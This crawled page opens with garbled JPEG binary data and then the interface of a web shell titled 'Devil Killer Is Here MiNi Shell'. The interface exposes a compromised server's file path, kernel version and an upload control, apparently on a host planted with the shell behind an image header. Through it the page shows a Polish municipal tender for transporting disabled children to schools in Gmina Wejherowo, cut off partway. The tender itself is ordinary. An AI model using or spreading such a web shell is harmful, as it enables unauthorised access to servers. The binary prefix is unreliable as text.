JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240715/0041297101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz wraz z opieką dzieci niepełnosprawnych zamieszkałych na terenie Gminy Wejherowo do/z placówek oświatowych od dnia 01.09.2024 r. do dnia 31.08.2025 r. z podziałem na 4 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wejherowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Transportowa</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugwejherowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ugwejherowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz wraz z opieką dzieci niepełnosprawnych zamieszkałych na terenie Gminy Wejherowo do/z placówek oświatowych od dnia 01.09.2024 r. do dnia 31.08.2025 r. z podziałem na 4 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b696ac4-e03c-421e-b7ba-abb264cf766c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00412971</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00052636/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Przewóz wraz z opieką dzieci niepełnosprawnych zamieszkałych na terenie Gminy Wejherowo do/z placówek oświatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_wejherowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_wejherowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem:1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich<br/>nowsze wersje;3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku<br/>Internet Explorer minimalnie wersja 10.0;4) włączona obsługa JavaScript;5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:1) Administratorem Danych Osobowych jest Wójt Gminy Wejherowo, ul. Transportowa 1, 84-200 Wejherowo, e-mail: sekretariat@ug.wejherowo.pl, tel: (58) 677 97 01) kontakt z inspektorem ochrony danych osobowych w Urzędzie Gminy: adres e-mail: iod@ugwejherowo.pl; 3) Dane osobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie art. 275 pkt 1 (trybie podstawowym bez przeprowadzenia negocjacji; art. 6 ust. 1 lit. b RODO – w odniesieniu do danych osobowych osoby będącej stroną umowy oraz art. 6 ust. 1 lit e rozporządzenia 2016/679 – w odniesieniu do pozostałych danych<br/>osobowych -w celu i zakresie niezbędnym do zawarcia i realizacji umowy. 4) Dobrowolne podanie wszelkich danych niewymaganych przepisami prawa jest traktowane jak wyrażenie zgody na ich przetwarzanie. (Art. 6 ust. 1 lit. a RODO);5) Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP;6) Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. 8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.9) W zakresie i granicach określonych w RODO w związku z przetwarzaniem Państwa danych osobowych posiada Pani/Pan:a) na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;b) na podstawie art. 16 RODO prawo do sprostowania i uzupełnienia danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO d) W przypadku danych osobowych przetwarzanych na podstawie zgody przysługuje Pani/Panu prawo do cofnięcia zgody na przetwarzanie bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej wycofaniem. 10) nie przysługuje Pani/Panu:a) prawo do usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie z prawa do sprostowania lub uzupełnienia danych, o którym mowa o którym mowa w art. 16 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników.W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZPiFZ.271.23.2024.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług przewozowych w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, zamieszkałych na terenie Gminy Wejherowo na trasie dom - placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej tj. od 01.09.2024 roku do 31.08.2025 roku <br/>Zakres przedmiotu zamówienia obejmuje przewóz do placówek oświatowych:<br/>1. Ośrodek Rewalidacyjno - Wychowawczy w Rumi, ul. Sabata 12 - uczniów zamieszkałych w miejscowościach: <br/>a) Bolszewo - 6 osób, w tym 3 poruszające się na wózku inwalidzkim;<br/>b) Gościcino - 3 osoby;<br/>c) Orle - 1 osoba.<br/>2. XVI Liceum Ogólnokształcące Specjalne w Gdyni, ul. Energetyków 13 - ucznia zamieszkałego w miejscowości Gościcino - 1 osoba.<br/>3. Szkoła Podstawowa Stowarzyszenia Dar w Gdyni, ul. Morska 509 - uczniów zamieszkałych w miejscowości Zamostne - 3 osoby.<br/>4. Szkoła Podstawowa nr 28, ul. Zielona 53, Gdynia - ucznia zamieszkałego w miejscowości Łężyce - 1 osoba. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w trakcie realizacji przedmiotu zamówienia przewiduje skorzystanie z prawa opcji, zgodnie z art. 441 ust. 1 ustawy Pzp dla części 1, części 3 i części 4 zamówienia.<br/>2. Opcja przewidziana przez Zamawiającego polega na zwiększeniu przedmiotu zamówienia, w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, na trasie dom – placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej, nie więcej niż o 6 (sześcioro) dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Wejherowo.<br/>3. Zamawiający uprawniony będzie do złożenia oświadczenia o skorzystaniu z Opcji lub jej części w trakcie trwania umowy na realizację Przedmiotu zamówienia. Zamawiający może nie skorzystać z Opcji lub skorzystać z Opcji w niepełnym zakresie, a Wykonawcy z tego tytułu nie będzie przysługiwało żadne roszczenie w stosunku do Zamawiającego. Zamawiający może złożyć oświadczenie o skorzystaniu z Opcji wielokrotnie, aż do wyczerpania maksymalnej wartości Opcji.<br/>4. Termin wykonania Opcji jest równy terminowi wykonania przedmiotu zamówienia. <br/>5. Zamawiający przewiduje możliwość skorzystania z Opcji pod warunkiem zabezpieczenia środków finansowych w budżecie, w wysokości odpowiadającej uruchamianemu zakresowi Opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przeznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie opiekuna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">posiadanie fotorejestratora w pojazdach przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług przewozowych w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, zamieszkałych na terenie Gminy Wejherowo na trasie dom - placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej tj. od 01.09.2024 roku do 31.08.2025 roku <br/>Zakres przedmiotu zamówienia obejmuje przewóz do placówki oświatowej: Ośrodek Rewalidacyjno - Wychowawczy w Kielnie, ul. Oliwska - uczniów zamieszkałych w miejscowościach:<br/>1) Bolszewo - 3 osób, w tym 2 poruszające się na wózku inwalidzkim;<br/>2) Góra - 1 osoba poruszająca się na wózku inwalidzkim;<br/>3) Kąpino - 1 osoba poruszająca się na wózku inwalidzkim. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przeznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie opiekuna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">posiadanie fotorejestratora w pojazdach przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług przewozowych w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, zamieszkałych na terenie Gminy Wejherowo na trasie dom - placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej tj. od 01.09.2024 roku do 31.08.2025 roku <br/>Zakres przedmiotu zamówienia obejmuje przewóz do placówki oświatowej: Powiatowy Zespół Kształcenia Specjalnego Specjalny Ośrodek Szkolno - Wychowawczy nr 1 w Wejherowie, ul. Sobieskiego 279 uczniów zamieszkałych w miejscowościach:<br/>1) Sopieszyno- 3 osoby;<br/>2) Ustarbowo - 1 osoba;<br/>3) Pętkowice - 1 osoba;<br/>4) Gowino - 2 osoby, w tym 1 osoba poruszająca się na wózku inwalidzkim;<br/>5) Nowy Dwór Wejherowski - 1 osoba;<br/>6) Bieszkowice - 1 osoba;<br/>7) Łężyce - 1 osoba. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w trakcie realizacji przedmiotu zamówienia przewiduje skorzystanie z prawa opcji, zgodnie z art. 441 ust. 1 ustawy Pzp dla części 1, części 3 i części 4 zamówienia.<br/>2. Opcja przewidziana przez Zamawiającego polega na zwiększeniu przedmiotu zamówienia, w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, na trasie dom – placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej, nie więcej niż o 6 (sześcioro) dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Wejherowo.<br/>3. Zamawiający uprawniony będzie do złożenia oświadczenia o skorzystaniu z Opcji lub jej części w trakcie trwania umowy na realizację Przedmiotu zamówienia. Zamawiający może nie skorzystać z Opcji lub skorzystać z Opcji w niepełnym zakresie, a Wykonawcy z tego tytułu nie będzie przysługiwało żadne roszczenie w stosunku do Zamawiającego. Zamawiający może złożyć oświadczenie o skorzystaniu z Opcji wielokrotnie, aż do wyczerpania maksymalnej wartości Opcji.<br/>4. Termin wykonania Opcji jest równy terminowi wykonania przedmiotu zamówienia. <br/>5. Zamawiający przewiduje możliwość skorzystania z Opcji pod warunkiem zabezpieczenia środków finansowych w budżecie, w wysokości odpowiadającej uruchamianemu zakresowi Opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe 